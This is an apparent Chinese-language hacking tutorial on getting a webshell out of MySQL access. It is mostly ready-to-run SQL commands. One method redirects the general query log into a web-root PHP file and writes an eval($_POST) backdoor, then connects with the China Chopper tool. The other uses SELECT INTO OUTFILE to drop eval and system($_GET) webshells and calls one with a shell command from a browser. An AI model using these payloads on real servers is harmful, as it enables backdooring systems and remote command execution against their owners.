方法一:通过日志文件拿webshell
常用的语句如下:
show global variables like '%general%';
set global general_log='on';
set global general_log_file = 'D:/phpStudy_pro/WWW/muma.php';
show global variables like '%general%';
select '<?php eval($_POST["admin"]);?>';
select+'<?php+phpinfo();+?>'
select+'<?php+//%0Aphpinfo();+?>'
查看日志目录路径
show global variables like '%general%';
data:image/s3,"s3://crabby-images/d1036/d1036d03c76a9ef04af638d78db518c6a4e91752" alt=""
打开日志功能
set global general_log='on';
data:image/s3,"s3://crabby-images/d832a/d832a7ed54f8fd4f8cdaf0726b5769e99e567c9e" alt=""
设置日志文件目录,创建php日志文件
set global general_log_file='D:/phpStudy_pro/WWW/muma.php';
data:image/s3,"s3://crabby-images/50f49/50f495b838505abcdf002820528beff22ad48a8b" alt=""
查看自己创建的日志文件
show global variables like '%general%';
data:image/s3,"s3://crabby-images/4977a/4977a444b022fabe37ecdea244d717305cdbfc6c" alt=""
往日志文件里写一句话木马
select '<?php eval($_POST["admin"]);?>';
data:image/s3,"s3://crabby-images/44898/448988f84ac8470a1d01e9523db81905c9e785fc" alt=""
使用中国菜刀工具连接自己创建的php文件。
data:image/s3,"s3://crabby-images/692c6/692c65d5458ceb1b448d0a303ca57aed174fb827" alt=""
链接到了服务器的目录
data:image/s3,"s3://crabby-images/147ef/147ef96982973004759735eea434f13c505b4010" alt=""
懒人方法:也可以直接全部运行
show global variables like '%general%';
set global general_log='on';
set global general_log_file = 'D:/phpStudy_pro/WWW/muma.php';
show global variables like '%general%';
select '<?php eval($_POST["admin"]);?>';
data:image/s3,"s3://crabby-images/01479/0147979b738c380340f4c0322f570db69a4f6a85" alt=""
方法二:上传日志文件拿shell
常用语句
1.⾸先判断mysql位置
select @@datadir
路径:C:\phpStudy\MySQL\data\
2.猜测web路径
猜测web路径:C:\phpStudy\www
C:\phpStudy\WWW\web.php
3.写webshell
select "<?php eval($_POST[a]);?>" into outfile 'c:/phpstudy/www/b.php';
select "<?php system($_GET[a]);?>" into outfile 'c:/phpstudy/PHPTutorial/w
ww/d.php';
4.浏览器
http://192.168.2.8/d.php?a=dir ..\
select "<?php phpinfo();eval($_POST[a]);?>" into outfile 'C:\phpStudy\WWW
\web.php';
备注:/
不要⽤\,如⾥要⽤\\(转义)